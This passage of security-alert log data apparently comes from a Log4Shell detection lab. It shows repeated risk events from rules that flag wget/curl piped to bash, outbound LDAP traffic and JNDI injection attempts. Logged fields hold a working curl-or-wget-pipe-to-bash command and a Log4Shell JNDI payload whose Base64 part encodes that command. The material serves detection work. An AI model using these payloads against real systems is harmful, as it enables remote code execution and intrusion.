CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642753, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642751, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642753, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="CIS 12", annotations._all="PR.PT", annotations._all="DE.AE", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1190", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642642751, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 3", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642642716, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Ingress Tool Transfer", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", 